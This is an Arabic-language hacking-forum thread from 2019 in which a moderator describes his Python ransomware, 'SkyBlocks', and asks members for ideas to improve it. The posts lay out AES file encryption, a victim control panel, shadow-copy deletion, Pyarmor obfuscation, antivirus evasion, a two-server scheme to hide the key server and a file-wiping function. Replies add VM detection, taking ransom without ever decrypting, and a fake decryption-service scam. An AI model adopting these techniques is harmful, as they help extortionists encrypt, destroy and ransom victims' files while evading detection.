TO DONATE : BTC => 1BU6R1C4AQ77LjLZswQNKFwAupw61i88Kn || PM => U4089661


اهم قوانين :1- منع الردود الباهتة مثل شكرااااا و أخواتها 2- لا يسمح بالمشاحنات الطائفية باآ شكل من الأشكال 3- عدم استعمال الألفاظ التافهة و الكلام البذىء 4- عدم وضع معرفات التواصل الأجتماعى بالردود 5- الأطلاع على كامل القوانين واجب 


العودة   الحماية للأبد -Security 4 Ever > القسم الاخباري والتقني > قسم الأخبار التقنية والنقاشات الجادة

قسم الأخبار التقنية والنقاشات الجادة طرح جميع النقاشات الجادة والاخبار اليوميه التي تخص اختراق المواقع وتبعاتها ...

 
أدوات الموضوع انواع عرض الموضوع
  #1  
قديم 05-10-2019, 05:23 PM
الصورة الرمزية x0Slotleet
x0Slotleet
عضو مشرف للمنتدى
 
حـالة التــواجـد : x0Slotleet غير متواجد حالياً
تاريخ التسجيل: Feb 2012
الجــــنــــــس: ذكـر
المشاركات: 1,855
شكراً:2,191
تم شكره 3,827 مرة في 1,018 مشاركة
معدل تقييم المستوى: 0
x0Slotleet بدون تقييم
افتراضي SkyBlocks Ransomware

السلام عليكم، منذ فترة تعمقت في الرانسوموير، وحبيت اني ابرمج رانسووير من الصغر باستعمال بايثون 3

المهم برمجت تقريباً الكور كامل، باقي فيه بعض اللمسات الاخيرة وهذه مميزاته :

التشفير بإستعمال AES
توليد مفتاج وجلبه من السيرفر وبدا التشفير ثم مسحه من جذوره
لوحة تحكم كاملة للرانسوير وعدد الضحايا + يوجد اداة تعمل Generate للمفتاح اوتوماتيكي
تغيير صورة الجهاز
استعمال https لضمان عدم التنصت على المفاتيح

التشفير بإستعمال pycrypto وهي اسرع مكتبة في البايثون
استعمال Pyarmor وعمل Obfuscating للكود كامل لكي يصعب هندسة عكسيته ( ولكن طبعاً ممكن )
يدعم Py2EXE لكي نعمل ملف executable
حجم الملف 1.9MB ( غير مكشوف في virustotal )
مسح الShadow copy من الويندوز
قرائة الملفات والكتابة عليه 0 بطريقة الـBlocks لعدم استرجاع الملفات المحذوفة

import os def overwrite(f): """Overwrite a file with zeroes. Arguments: f -- name of the file """ stat = os.stat(f) with open(f, 'r+') as of: of.write('\0' * stat.st_size) of.flush()

يبحث عن 290 ext ويشفر بطريقة رهيبة وسريعة جداً

هارد D فيه 10GB ملفات شفرهم بوقت قصير جدا


واهم شيء، حاولت اتعامل مع شبكة tor ولكن لضيق الوقت ما نفع الامر، ففكرت بموضوع انه اسوي
2 سيرفر، واحد اتصل فيه من الرانسوموير ، والثاني هو لوحة التحكم لضمان عدم معرفتها

وهي كالتالي

1: يتصل الرانسوموير ب سيرفر رقم 1
2: يتصل سيرفر رقم 1 ب سيرفر رقم 2 الذي يولد المفتاح اوتوماتيكي
3: سيرفر رقم 2 يرد على سيرفر رقم 1 بالمفتاح
4: سيرفر رقم 1 يرد على الرانسوموير بالمفتاح ويبدا التشفير

طبعا الموضوع ياخذ اقل من ثانية

وبهذه الحالة، ان عمل تم فك تشفير الرانسومير بيعرفوا بس السيرفر رقم 1، اما سيرفر رقم 2 وهو الاهم يبقى سري
الى ان في حال تم اختراق سيرفر رقم 1 وقرائة الـSource Code فسوف يعرفون السيرفر رقم 2


هذا الاونلاين ...

اما اصدار الـOffline

يشفر عن طريق الوقت، ثم ميزت التشفير ومعرفته بقرائة ملف جديد اسمه Keys.txt

والدالة التي اشفر فيها ميزتها، ولا يمكن معرفة كيف يتم فك الشفير الى ان كان ضليع جداً في الهندسة العكسية ولغة الـPytjon

ثم اكيد عند فك التشفير، يتواصل مع صاحب الرانسوموير وعند الدفع يعطيه طريقة فك تشفيره ...


اريد اقتراحات، وافكار لاطورها في الرانسوموير، وانا ضيعت نص وقتي بالبرمجة على التفكير

ملاحظة: سوف انشر الSource Code لمن يهمه الامر، كامل بدون تعديل ولا تنقيص، ولكن لعدد قليل من الناس الموثوق بهم ...  
الصور المرفقة
نوع الملف: jpg Screenshot from 2019-10-05 21-04-29.jpg‏ (8.9 كيلوبايت, المشاهدات 39)
نوع الملف: jpg Screenshot from 2019-10-05 21-06-10.jpg‏ (5.2 كيلوبايت, المشاهدات 34)
نوع الملف: jpg Screenshot from 2019-10-05 21-06-41.jpg‏ (19.9 كيلوبايت, المشاهدات 28)
نوع الملف: jpg Screenshot from 2019-10-05 21-07-09.jpg‏ (19.8 كيلوبايت, المشاهدات 31)
نوع الملف: jpg Screenshot from 2019-10-05 21-07-23.jpg‏ (19.3 كيلوبايت, المشاهدات 43)

 

 

one single vulnerability, all an attacker needs

رد مع اقتباس
12 أعضاء قالوا شكراً لـ x0Slotleet على المشاركة المفيدة:
  #2  
قديم 05-10-2019, 06:39 PM
الصورة الرمزية nine_443
nine_443
مسجل جديد
 
حـالة التــواجـد : nine_443 غير متواجد حالياً
تاريخ التسجيل: Oct 2019
الجــــنــــــس: ذكـر
المشاركات: 7
شكراً:4
تم شكره 2 مرة في مشاركة واحدة
معدل تقييم المستوى: 0
nine_443 بدون تقييم
افتراضي رد: SkyBlocks Ransomware

عندي سؤالين لو سمحت :

1- لانك برمجت الفايروس ف البايثون , هل يشترط وجود البايثون على جهاز الضحة ليعمل الفايروس ؟



2- لماذا تفحص على virustotal وهو يرسل القيم ؟ ما الهدف من الفحص مثل هيك موقع ؟ مع العلم في مواقع افضل مثل : http://scanlabs.net/



واشكرك من الاعماق على طرح مثل هيك مواضيع .  
رد مع اقتباس
  #3  
قديم 05-10-2019, 10:01 PM
الصورة الرمزية Y4hy4
Y4hy4
:: عضو خاص ::
 
حـالة التــواجـد : Y4hy4 غير متواجد حالياً
تاريخ التسجيل: Oct 2010
مكـان الإقامـة : /home
الجــــنــــــس: ذكـر
المشاركات: 135
شكراً:238
تم شكره 276 مرة في 86 مشاركة
معدل تقييم المستوى: 10
Y4hy4 على طريق التميز
افتراضي رد: SkyBlocks Ransomware

لا أعرف إن كانت فكرة جيدة أو لا


لكن ما رأيك إنك تعمل سيرفر honeypot و سيرفر بروكسي هو يقرر إنو يوجه الركوست إلى سيرفر حقيقي أو honeypot و تكون في signature حتى تعرف تميز بين الركوست إلي جاية من ransomeware أو الركوست إلي جاية من شخص أخر يحاول يعرف ip سيرفر حقيقي  

 

 

People always make the best exploits. I've never found it hard to hack most people. If you listen to them, watch them, their vulnerabilities are like a neon sign screwed into their heads.
Mr. robot
رد مع اقتباس
2 أعضاء قالوا شكراً لـ Y4hy4 على المشاركة المفيدة:
  #4  
قديم 05-10-2019, 11:21 PM
الصورة الرمزية UzunDz
UzunDz
فريق الحماية للأبد
 
حـالة التــواجـد : UzunDz غير متواجد حالياً
تاريخ التسجيل: Oct 2011
الجــــنــــــس: ذكـر
المشاركات: 1,671
شكراً:4,471
تم شكره 5,465 مرة في 1,364 مشاركة
معدل تقييم المستوى: 10
UzunDz على طريق التميز
افتراضي رد: SkyBlocks Ransomware

اصابني منذ فترة فيروس فدية تحت اسم Nemty project
يحذف ملفات restore point وملفات shadow copy حتى عند استرجاع الملفات القديمة تجدها مشفرة ايظا .. والدفع بيتكون عبر سيرفرات الtor
الف دولار ليتم فك التشفير ..
كفكرة اضافية بتضع رابط محفظة بيتكوين والشخص الذي يقوم بالدفع لست مجبرا على ان تفك شفرة ملفاته .. يمكنك تخطي جزئية فك التشفير كليا وجعلها وهمية اي بتشفير احادي القطب حتى انت لا تملك طريقة فكه لأن الأهم هو وصول المال.

للإخوة كإجراء احترازي قوموا بتفعيل bitlocker على الهارد الذي يحتوي ملفات مهمة
وتجريب اي برنامج في المحاكي او sandbox.  
رد مع اقتباس
5 أعضاء قالوا شكراً لـ UzunDz على المشاركة المفيدة:
  #5  
قديم 06-10-2019, 06:22 AM
الصورة الرمزية x0Slotleet
x0Slotleet
عضو مشرف للمنتدى
 
حـالة التــواجـد : x0Slotleet غير متواجد حالياً
تاريخ التسجيل: Feb 2012
الجــــنــــــس: ذكـر
المشاركات: 1,855
شكراً:2,191
تم شكره 3,827 مرة في 1,018 مشاركة
معدل تقييم المستوى: 0
x0Slotleet بدون تقييم
افتراضي رد: SkyBlocks Ransomware

اقتباس:
المشاركة الأصلية كتبت بواسطة UzunDz مشاهدة المشاركة

اصابني منذ فترة فيروس فدية تحت اسم Nemty project
يحذف ملفات restore point وملفات shadow copy حتى عند استرجاع الملفات القديمة تجدها مشفرة ايظا .. والدفع بيتكون عبر سيرفرات الtor
الف دولار ليتم فك التشفير ..
كفكرة اضافية بتضع رابط محفظة بيتكوين والشخص الذي يقوم بالدفع لست مجبرا على ان تفك شفرة ملفاته .. يمكنك تخطي جزئية فك التشفير كليا وجعلها وهمية اي بتشفير احادي القطب حتى انت لا تملك طريقة فكه لأن الأهم هو وصول المال.

للإخوة كإجراء احترازي قوموا بتفعيل bitlocker على الهارد الذي يحتوي ملفات مهمة
وتجريب اي برنامج في المحاكي او sandbox.



هههههههههه هذه الـNasty way

فكرت فيها والله، اسوي المفتاح عن طريق الوقت، ثم لا اكتب المفتاح بشيء، ويصعب فكه لانه يعتمد على الميلي سيكوند

عالعموم، وصلت لمرحلة نشفان بالاموال، اني فكرت فيها وكنت رح سويها لانه الاهم الوصول للمال وليس عدد الضحايا :P

بس، غيرت الفكرة كلها ، احنا مش مخربين  

 

 

one single vulnerability, all an attacker needs

رد مع اقتباس
  #6  
قديم 06-10-2019, 06:23 AM
الصورة الرمزية x0Slotleet
x0Slotleet
عضو مشرف للمنتدى
 
حـالة التــواجـد : x0Slotleet غير متواجد حالياً
تاريخ التسجيل: Feb 2012
الجــــنــــــس: ذكـر
المشاركات: 1,855
شكراً:2,191
تم شكره 3,827 مرة في 1,018 مشاركة
معدل تقييم المستوى: 0
x0Slotleet بدون تقييم
افتراضي رد: SkyBlocks Ransomware

اقتباس:
المشاركة الأصلية كتبت بواسطة Y4hy4 مشاهدة المشاركة

لا أعرف إن كانت فكرة جيدة أو لا


لكن ما رأيك إنك تعمل سيرفر honeypot و سيرفر بروكسي هو يقرر إنو يوجه الركوست إلى سيرفر حقيقي أو honeypot و تكون في signature حتى تعرف تميز بين الركوست إلي جاية من ransomeware أو الركوست إلي جاية من شخص أخر يحاول يعرف ip سيرفر حقيقي

فكرة جميلة، فكرت فيها، ولكن لا يوجد وقت والله

هو فقط 2 استبدال scripts بي اتش بي، واخد تحطه في سيرفر والثاني في سيرفر، السيرفر الاهم الي يكون فيه قاعدة البيانات ...  

 

 

one single vulnerability, all an attacker needs

رد مع اقتباس
  #7  
قديم 06-10-2019, 06:26 AM
الصورة الرمزية x0Slotleet
x0Slotleet
عضو مشرف للمنتدى
 
حـالة التــواجـد : x0Slotleet غير متواجد حالياً
تاريخ التسجيل: Feb 2012
الجــــنــــــس: ذكـر
المشاركات: 1,855
شكراً:2,191
تم شكره 3,827 مرة في 1,018 مشاركة
معدل تقييم المستوى: 0
x0Slotleet بدون تقييم
افتراضي رد: SkyBlocks Ransomware

اقتباس:
المشاركة الأصلية كتبت بواسطة nine_443 مشاهدة المشاركة

عندي سؤالين لو سمحت :

1- لانك برمجت الفايروس ف البايثون , هل يشترط وجود البايثون على جهاز الضحة ليعمل الفايروس ؟



2- لماذا تفحص على virustotal وهو يرسل القيم ؟ ما الهدف من الفحص مثل هيك موقع ؟ مع العلم في مواقع افضل مثل : http://scanlabs.net/



واشكرك من الاعماق على طرح مثل هيك مواضيع .

http://www.py2exe.org/

py2exe is a Python Distutils extension which converts Python استبدال scripts into executable Windows programs, able to run without requiring a Python installation.



لا يشترط تنصيب البايثون، هو يدمج المكتبات المطلوبة بالملف ...

2 :

فحصته عل سريع، لا يوجد نية نشر الرانسوموير، ولكن ان حصل في المستقبل، لا تقلق لن يكون ملف ضار  

 

 

one single vulnerability, all an attacker needs

رد مع اقتباس
  #8  
قديم 06-10-2019, 06:31 AM
الصورة الرمزية x0Slotleet
x0Slotleet
عضو مشرف للمنتدى
 
حـالة التــواجـد : x0Slotleet غير متواجد حالياً
تاريخ التسجيل: Feb 2012
الجــــنــــــس: ذكـر
المشاركات: 1,855
شكراً:2,191
تم شكره 3,827 مرة في 1,018 مشاركة
معدل تقييم المستوى: 0
x0Slotleet بدون تقييم
افتراضي رد: SkyBlocks Ransomware

تعديل رقم 1 :

باين الاعضاء مخها نضيفة :d

المهم احد الاعضاء اتكلم معاي وعرض فكرته،

الرانسوموير سوف يكون فيه شرطية، ان كان في الجهاز انترنت، خذ المفتاح من السيرفر ثم ابدا التشفير، ان كان لا يوجد فيه انترنت، سوي المفتاح تلقائي وابدا التشفير ...

ثم التاكد ان كان الجهاز vm عن طريق بحث بعض الملفات الخاصة بالvm او مثل رانسوموير الوانا كراي، ان كان على شبكة nat لا يشفر شيء ...

سوف اضيفها عما قريب ان شاء الله .. وبكذا يبقى اصدار واحد فقط يشتغل اونلاين واوفلاين ..  

 

 

one single vulnerability, all an attacker needs

رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ x0Slotleet على المشاركة المفيدة:
  #9  
قديم 06-10-2019, 06:51 PM
الصورة الرمزية CorSica
CorSica
عضو مميز
 
حـالة التــواجـد : CorSica غير متواجد حالياً
تاريخ التسجيل: Dec 2012
مكـان الإقامـة : في البطيمة
الجــــنــــــس: ذكـر
الــهـــوايـــــة: JIL_FM
المشاركات: 127
شكراً:240
تم شكره 297 مرة في 63 مشاركة
معدل تقييم المستوى: 0
CorSica بدون تقييم
افتراضي رد: SkyBlocks Ransomware

من باب كرام الهاكر الاخلاقي يترك نوع من المكافاء لضحيه
يعني لو اضحيه لم يدفع الفاديه بعد مرور 6 اشهر يتم فك تشفير الملفات
بدون تغير تاريخ الجهاز يعني التحكم يكون من لوحة التحكم وليس من الجهاز
مجرد راي  

 

 

Les Bons Comptes Font Toujours Les Bons Amis
رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ CorSica على المشاركة المفيدة:
  #10  
قديم 07-10-2019, 09:37 AM
الصورة الرمزية Dr.Mohamed
Dr.Mohamed
Sec4Ever Team
 
حـالة التــواجـد : Dr.Mohamed غير متواجد حالياً
تاريخ التسجيل: Aug 2011
مكـان الإقامـة : .
الجــــنــــــس: ذكـر
الــهـــوايـــــة: .
المشاركات: 2,194
شكراً:1,844
تم شكره 5,585 مرة في 1,396 مشاركة
معدل تقييم المستوى: 10
Dr.Mohamed بدون تقييم
افتراضي رد: SkyBlocks Ransomware

تقدر تستعمل فكرة انك تنشر فيروسات الفدية بمختلف الاشكال والانواع

وتعمل موقع خدمات للفك بعمولة توهم الضحية انك كسرت الحماية وتفك بثمن رمزي 90% off  

 

 

...........
رد مع اقتباس
3 أعضاء قالوا شكراً لـ Dr.Mohamed على المشاركة المفيدة:


الذين يشاهدون محتوى الموضوع الآن : 2 ( الأعضاء 0 والزوار 2)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[خبر] ransomware WanaDecryptor Zoba قسم الأخبار التقنية والنقاشات الجادة 40 19-05-2017 09:58 AM
[خبر] First javascript ransomware Y4hy4 قسم الأخبار التقنية والنقاشات الجادة 4 06-01-2016 12:14 PM
FAKBEN - Ransomware X01do3 قسم نقاشات الاختراق والحمايه 13 27-11-2015 10:52 PM


الساعة الآن 02:40 PM